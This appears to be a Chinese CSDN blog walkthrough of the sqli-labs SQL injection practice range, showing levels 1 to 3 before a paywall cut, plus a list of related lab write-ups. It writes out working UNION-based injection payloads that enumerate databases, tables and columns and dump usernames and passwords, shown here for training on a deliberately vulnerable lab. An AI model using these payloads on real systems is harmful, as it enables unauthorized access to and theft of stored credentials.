sqli-labs靶场(1-20)通关手册

最新推荐文章于 2025-02-01 22:15:36 发布
最新推荐文章于 2025-02-01 22:15:36 发布
阅读量1k 收藏 18
点赞数 13
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58168821/article/details/140064066
版权

Less1

首先在上方URL地址栏输入代码,判断是否存在注入点

?id=1' and 1=1 -- -

输入代码回车后,有回显,说明存在注入点,再输入下面的代码

?id=1' and 1=2" -- -

如上图显示,没有回显,说明可以利用 字符注入

确定好注入字符后使用下面的代码判断有多少列,超出列数则会报错,此处采用二分法,猜测尝试。

?id=1' order by 4 -- 

判断出有多少列后,再输入下方代码判断数据显示点(id要改为0或负数,使用UNION联合查询)

?id=0' union select 1,2,3 -- -

把id要改为0或负数的作用

确保联合查询的结果可见:通过将id设置为0或负数,攻击者可以确保原始查询返回的记录尽量少,甚至没有记录。这使得UNION查询的结果更容易被观察到。

避免意外的数据干扰:如果原始查询返回了很多记录,这些记录可能会掩盖联合查询返回的数据。将id设置为一个不可能存在的值(如0或负数),可以避免这种情况,从而更容易查看和分析联合查询的结果。

利用数据库的特性:在某些数据库系统中,id为0或负数的记录可能不存在。这有助于确保只有UNION查询返回的结果被显示。

使用下面的代码爆出数据库名称及版本信息

?id=-1'union select 1,database(),version()--+

爆出数据表名称

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆出字段信息

?id=-99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

爆出用户名和密码

?id=-99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

Less2

首先判断注入点,在地址栏输入代码,

?id=1'and 1=1--+

发现报错,如上图所示,说明存在注入点,但不是用单引号进行闭合。

使用双引号依旧报错,且报错信息依旧如上图,看不到数字,推测为数字性注入,尝试下面的代码

id=1

如图,证明猜测正确。然后开始判断数据库的列数,判断数据显示点,然后开始爆破,获取信息,该部分操作与less1完全相同,只需把less1中的单引号去掉即可。代码及效果图如下

id=1order by 3 -- -

?id=-1 union select 1,2,3

?id=-1 union select 1,database(),version()

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

?id=-1 union select 1,2,group_concat(username ,id , password) from users

less3

除注入类型改变外,其余部分与前两关一致。

判断注入点

?id=1'

判断可能为括号闭合,输入代码

?id=1') --+

?id=1') order by 3 --+

?id=-1') union select 1,2,3--+

?id=-1') union select 1,database(),version()--+

最低0.47元/天 解锁文章
m0_58168821
关注
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2375
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labssqli-labs 靶场通关1-16)
m0_71944965的博客
09-02 642
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场sqli-labs 靶场通关1-16)sqli-labs第一关 sqli-labs第一关 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
sqllab靶场通关详解(前22关)
weixin_43433141的博客
01-21 729
作者使用phpstudy将靶场放置在本地环境中,配置如下:直接在浏览器中输入127.0.0.1/sql进行访问即可,有问题可以关注公众号回复【好友】私聊笔者。
sqlilabs靶场120题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 2808
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-labs靶场笔记
qq_33441500的博客
10-20 267
less-1 单引号的显错注入 关键代码段 直接输入单引号让其报错 由代码我们可以看出数据库查询语句只是对id传参进行了...
sqli-labs靶场通关攻略(1-20)
kknifek的博客
08-14 1544
sql手工注入
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1620
Sqli-labs-master靶场1-20通关教程
sqli-labs靶场通关
最新发布
2401_87576048的博客
02-01 1183
mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
Sqli-labs靶场通关1-20关)
2301_77977773的博客
07-03 1035
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
sqli-labs SQL注入靶场通关手册1-20
2401_83601024的博客
05-18 2027
因为我们使用单引号闭合了 passwd 参数所在的 Sql 语句的前面的部分,使用 OR 连接的 updatexml() 函数就会被执行。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用 “#” 注释掉后面的内容注入。
sqli-labs SQL注入靶场通关手册1-21
2301_76594872的博客
07-02 1124
前面需要准备打开phpstudy我这里是老版:phpstudy若3306端口被占用,win+r,cmd,命令行提示符里输入netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程同时需要再网页上打开跳转到如下界面:配置成功。
Sqlilabs-20
KAKA的博客
07-09 639
十大关一关卡,小试牛刀来到了第 20 关: 本关还是在 HTTP HEADRE 做文章,具体为 COOKIE 先输入正确的用户名和密码,进入界面看看: 通过观察我们可以看到具体的 payload 该如何构造 把 hackbar 的 cookie 栏调出来: –查表 uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=databas
sqli-labs20
jimggg的博客
03-20 300
Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)
sqli-labs(20)
weixin_30419799的博客
05-27 130
0X01 试探一下 这是登录成功的页面 这里题目高速我们是基于cookie的注入 0X01抓包试探 这里登陆的时候有两个包 我们要含有cookie的那个包 0X02试探判断是否cookie存在注入 Cookie: uname=admin' 报错 那么应该是基于'的cookie注入 我们现在找到了 是cookie的注入 并且是’闭合 那么我们如何进行注...
SQL注入:sqli-labs靶场通关1-37关)
热门推荐
qq_68163788的博客
02-03 1万+
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 3920
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sqli-liabs学习SQL注入之旅(第十一关~第二十关)
guanjian_ci的博客
04-22 2888
十一关 可以看到十一关和之前的十关是截然不同,偶尔也得换换口味才有新鲜感嘛!话不多说,开搞! 前言:这里有两个提交框,我们应该从哪里注入呢?这并不是困扰我们的问题。我们在实战中应该多方面测试,两个框都测试一下,那个可以就搞那个咯!多搞点不亏的!咳咳咳。 第一步:判断参数接受的类型。 账号:admin' 密码:1111 页面报错 账号:admin' # 密码:1111 登录成功(说明这一关存在弱口令,但我们要学习的是SQL注入) 账号:admin .
SQLi Labs Lesson20
1ame的博客
08-16 351
Lesson - 20 POST - Cookie Injection - Uagent field - error based 该网页大概框架如下: if(!isset($_COOKIE['uname'])) { //声明实现过滤函数check_input function check_input($value) { ......
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1545
Sqli-labs 靶场通关学习记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值